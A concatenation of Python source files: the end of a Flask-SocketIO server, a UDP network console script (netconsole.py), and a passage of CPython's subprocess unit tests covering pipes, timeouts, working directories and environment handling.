{'data': 'Disconnected!', 'count': session['receive_count']})
disconnect()
@socketio.on('connect', namespace='/api')
def test_connect():
print "User Connected"
emit('my response', {'data': 'Connected', 'count': 0})
@socketio.on('disconnect', namespace='/api')
def test_disconnect():
print('Client disconnected')
if __name__ == '__main__':
socketio.run(app, port=5001)
|
netconsole.py | #!/usr/bin/env python
# Copyright (c) Robert Blair Mason Jr. (rbmj) rbmj@verizon.net
# see LICENSE for license information.
import socket
import sys
import threading
import atexit
import time
#allow import in both python 2.x and 3.x
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
#ports
UDP_IN_PORT=6666
UDP_OUT_PORT=6668
#set up recieving socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind( ('',UDP_IN_PORT) )
#set up sending socket - use separate socket to avoid race condition
out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
out.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
out.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
out.bind( ('',UDP_OUT_PORT) ) #bind is necessary for escoteric reasons stated on interwebs
#set up atexit handler to close sockets
def atexit_func():
sock.close()
out.close()
atexit.register(atexit_func)
#set up threads to emulate non-blocking io
#thread-level emulation required for compatibility with windows
stdin_queue = Queue()
sock_queue = Queue()
def enqueue_output_file(f, q):
for line in iter(f.readline, b''): #thanks to stackoverflow
q.put(line)
def enqueue_output_sock(s, q):
while True:
q.put(s.recv(4096))
stdin_reader = threading.Thread(target = enqueue_output_file, args = (sys.stdin, stdin_queue))
sock_reader = threading.Thread(target = enqueue_output_sock, args = (sock, sock_queue))
stdin_reader.daemon = True
sock_reader.daemon = True
stdin_reader.start()
sock_reader.start()
#send a message out the socket
def send_msg(msg):
out.sendto(line, ('10.255.255.255', UDP_OUT_PORT))
#main loop
while True:
try: msg = sock_queue.get_nowait()
except Empty:
pass # no output
else:
sys.stdout.write(msg)
try: line = stdin_queue.get_nowait()
except Empty:
pass # no input
else:
send_msg(line)
time.sleep(0.05)
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
import pathlib
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
raise unittest.SkitTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
# Windows pipe size can be acquired via GetNamedPipeInfoFunction
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# However, this function is not yet in _winapi.
p.stdin.write(b"pear")
p.stdin.close()
p.stdout.close()
p.stderr.close()
finally:
p.kill()
p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
p.stdout.close()
p.stderr.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
